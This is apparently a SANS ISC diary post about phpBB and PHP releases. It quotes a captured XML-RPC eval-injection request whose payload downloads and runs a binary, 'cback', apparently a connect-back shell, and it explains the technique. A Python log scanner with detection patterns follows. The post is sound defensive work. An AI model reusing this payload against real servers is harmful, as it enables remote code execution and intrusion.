SANS ISC InfoSec Forums
PHP and phpBB releases
We usually do not post news about software releases, but these two are particularly important.
The first is the new release of phpBB. This bulletin board system is very widely deployed and was the target of Perl bots some time ago because of a vulnerability in its code, so it is important to stay current with the vendor's releases.
The second is PHP itself. Version 4.4.1 has just been released, and I would suggest keeping up to date on this one too.

Today we received a post about some Apache log entries showing attempts to exploit vulnerabilities in another PHP component, xmlrpc.php. The entry was this one:

POST /wordpress/xmlrpc.php HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Type: text/xml
Content-Length:269

<?xml version="1.0"?><methodCall><methodName>test.method</methodName><params><param>
<value><name>',''));echo '_begin_';echo `cd /tmp;wget xxx.xxx.255.44/cback;chmod +x cback;./cback xxx.xxx.227.194 8080`;echo '_end_';exit;/*</name></value></param></params></methodCall>

This looks like they were targeting a vulnerability in xmlrpc.php. The request body shows the technique: the parameter value closes the string and function call that the library's eval was building (the leading ',''));), appends PHP that runs a shell command through backticks to fetch and execute a binary, and comments out whatever follows with /*. According to the project's website, the new release fixes several security vulnerabilities: "Note: all users are encouraged to upgrade to release 1.2 or later, since known exploits exist for earlier versions. All use of eval as a potential remote code execution exploit has been removed in release 1.2. More info on the vulnerabilities can be found at the bottom of the page."
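As an added example (not part of the diary), here is a small Python scanner that applies the markers visible in the captured request above to XML-RPC POST bodies, so a WAF log review or IDS rule test can pick out this class of eval injection. The two request bodies and the 203.0.113.x addresses are constructed samples.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample mirroring the captured POST body (addresses replaced with TEST-NET values).
CAPTURED_BODY = """<?xml version="1.0"?><methodCall><methodName>test.method</methodName><params><param>
<value><name>',''));echo '_begin_';echo `cd /tmp;wget 203.0.113.44/cback;chmod +x cback;./cback 203.0.113.194 8080`;echo '_end_';exit;/*</name></value></param></params></methodCall>"""

# Constructed sample of a legitimate pingback call, which must not be flagged.
BENIGN_BODY = """<?xml version="1.0"?><methodCall><methodName>pingback.ping</methodName>
<params><param><value><string>http://example.com/post/1</string></value></param>
<param><value><string>http://example.net/post/2</string></value></param></params></methodCall>"""

# Markers a legitimate XML-RPC parameter value has no reason to contain: the breakout of
# the eval'd string, PHP statements, shell command substitution and a download-then-run chain.
INDICATORS = {
    "eval_breakout": re.compile(r"""['"]\s*,\s*['"]{2}\s*\)\)\s*;"""),
    "php_statement": re.compile(r"\b(?:echo|exit|system|passthru|shell_exec)\b"),
    "backtick_shell": re.compile(r"`[^`]+`"),
    "comment_terminator": re.compile(r"/\*"),
    "download_and_run": re.compile(r"\b(?:wget|curl)\b.*\bchmod\b"),
}


def leaf_values(body):
    """Return the text of every leaf element (methodName and parameter values).
    Malformed XML is common in exploit traffic, so fall back to scanning the raw body."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return [body]
    return [el.text for el in root.iter() if len(el) == 0 and el.text and el.text.strip()]


def scan_xmlrpc_body(body):
    """Return {indicator_name: first matched text} for every marker found in the request."""
    findings = {}
    for text in leaf_values(body):
        for name, pattern in INDICATORS.items():
            match = pattern.search(text)
            if match and name not in findings:
                findings[name] = match.group(0)
    return findings


if __name__ == "__main__":
    for label, body in (("captured", CAPTURED_BODY), ("benign", BENIGN_BODY)):
        print(label, scan_xmlrpc_body(body))
```

Any non-empty result is a strong signal; the `eval_breakout` marker alone is specific enough to alert on, while `php_statement` by itself could appear in legitimate blog content and should be combined with the others.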
----------------------------------------------
Pedro Bueno, ISC Handler ( pbueno //%// isc. sans. org)